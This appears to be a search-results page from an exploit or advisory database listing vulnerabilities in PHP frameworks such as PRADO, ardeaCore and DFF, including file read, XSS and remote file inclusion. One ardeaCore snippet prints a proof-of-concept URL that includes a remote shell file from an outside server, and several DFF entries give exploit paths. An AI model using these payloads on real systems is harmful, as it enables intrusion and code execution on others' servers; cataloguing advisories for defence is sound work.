335 matches found
Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit
No description provided by source. Seagull PHP Framework <= 0.6.4 (fckeditor) Arbitrary File Upload Exploit. author...: EgiX mail.....:...
Debian Security Advisory DSA 2853-1 (horde3 - remote code execution)
Pedro Ribeiro from Agile Information Security found a possible remote code execution on Horde3, a web application framework. Unsanitized variables are passed to the unserialize PHP function. A remote attacker could specially craft one of those variables, allowing her to load and execute code...
PRADO PHP Framework <= 3.2.0 Multiple Directory Traversal Vulnerabilities - Active Check
PRADO PHP Framework is prone to multiple directory traversal vulnerabilities.
PRADO PHP Framework 3.2.0 Arbitrary File Read Vulnerability
Summary PRADO is a component-based and event-driven programming framework for developing Web applications in PHP 5. PRADO stands for PHP Rapid Application Development Object-oriented. Description Input passed to the 'sr' parameter in 'functionaltests.php' is not properly sanitised before being us...
PRADO PHP Framework 3.2.0 File Read
PRADO PHP Framework 3.2.0 Arbitrary File Read Vulnerability Vendor: Prado Software Product web page: http://www.pradosoft.com Affected version: 3.2.0 r3169 Summary: PRADO is a component-based and event-driven programming framework for developing Web applications in PHP 5. PRADO stands for PHP Rap...
PRADO PHP Framework 3.2.0 - Arbitrary File Read
PRADO PHP Framework 3.2.0 Arbitrary File Read Vulnerability Vendor: Prado Software Product web page: http://www.pradosoft.com Affected version: 3.2.0 r3169 Summary: PRADO is a component-based and event-driven programming framework for developing Web...
PyroCMS 2.1.1 CRLF Injection And Stored XSS Vulnerability
Summary PyroCMS is a CMS built using the CodeIgniter PHP framework. Using an MVC architecture it was built with modularity in mind. Lightweight, themeable and dynamic. Description PyroCMS suffers from a stored XSS and HTTP Response Splitting vulnerability when parsing user input to the 'title' an...
Prado TJavaScript::encode() script injection vulnerability
Prado TJavaScript::encode() script injection vulnerability. Vulnerability severity: medium; Vulnerability type: cross-site script injection attack, cookie theft, session hijacking, stealing of sensitive information; Remotely exploitable: yes; Vulnerability discovery date: 2012/03/07; Vulnerability...
Elefant CMS 1.0.2 Cross Site Scripting
elefantcms vendor: http://www.elefantcms.com Version: Latest stable release: 1.0.2 Author: Karthik R 3psil0nLambDa Email: [email protected] My blog: www.epsilonlambda.wordpress.com Google dork: Powered by Elefant CMS...
Remote file inclusion
PHP remote file inclusion vulnerability in ardeaCore/lib/core/ardeaInit.php in ardeaCore PHP Framework 2.2 allows remote attackers to execute arbitrary PHP code via a URL in the pathForArdeaCore parameter. NOTE: some of these details are obtained from third party information...
CVE-2010-4998
CVE-2010-4998 affects the ardeaCore PHP Framework 2.2. A PHP remote file inclusion flaw in ardeaCore/lib/core/ardeaInit.php allows an attacker to execute arbitrary PHP code via a URL supplied to the pathForArdeaCore parameter. NVD records a base CVSS v2 score of 7.5 (HIGH) with network access and...
ardeaCore_v2.25 PHP Framework Remote File Inclusion
Exploit for php platform in category web applications ! Discovered: n0n0x ! Homepage: http://priasantai.uni.cc/ ! Remote: yes Hello gay x PoC: http://host/ardeaCorev2.25/ardeaCore/lib/core/ardeaInit.php?pathForArdeaCore=http://server/shell.tmp???...
CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit
$Id: cakephpcachecorruption.rb 11074 2010-11-19 20:43:56Z swtornio $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in DataFeedFile DFF PHP Framework API allow remote attackers to execute arbitrary PHP code via a URL in the DFFconfigdirinclude parameter to (1) DFFaffiliateclientAPI.php, (2) DFFfeaturedprdt.func.php, (3) DFFmer.func.php, (4) DFFmerprdt.func.php, (5)...
DFF PHP Framework API (Data Feed File) RFI Vulnerabilities
No description provided by source. DFF PHP Framework API Data Feed File Multiple Inclusion Vulnerabilities Script :http://opensource.datafeedfile.com/download/DFFPHPFrameworkAPI-latest.zip Exploits : /DFFPHPFrameworkAPI-latest/include/DFFaffiliateclientAPI.php?DFFconfigdirinclude=...
DFF PHP Framework API - Data Feed File Remote File Inclusion
DFF PHP Framework API Data Feed File Multiple Inclusion Vulnerabilities Script :http://opensource.datafeedfile.com/download/DFFPHPFrameworkAPI-latest.zip Exploits :...
DFF PHP Framework API (Data Feed File) RFI Vulnerabilities
Exploit for unknown platform in category web applications. DFF PHP Framework API Data Feed File RFI Vulnerabilities. DFF PHP Framework API Data Feed File Multiple Inclusion...
dffphp-rfi.txt
DFF PHP Framework API Data Feed File Multiple Inclusion Vulnerabilities Script :http://opensource.datafeedfile.com/download/DFFPHPFrameworkAPI-latest.zip Exploits : /DFFPHPFrameworkAPI-latest/include/DFFaffiliateclientAPI.php?DFFconfigdirinclude=...
DFF PHP Framework API - 'Data Feed File' Remote File Inclusion
DFF PHP Framework API Data Feed File Multiple Inclusion Vulnerabilities Script :http://opensource.datafeedfile.com/download/DFFPHPFrameworkAPI-latest.zip Exploits : /DFFPHPFrameworkAPI-latest/include/DFFaffiliateclientAPI.php?DFFconfigdirinclude=...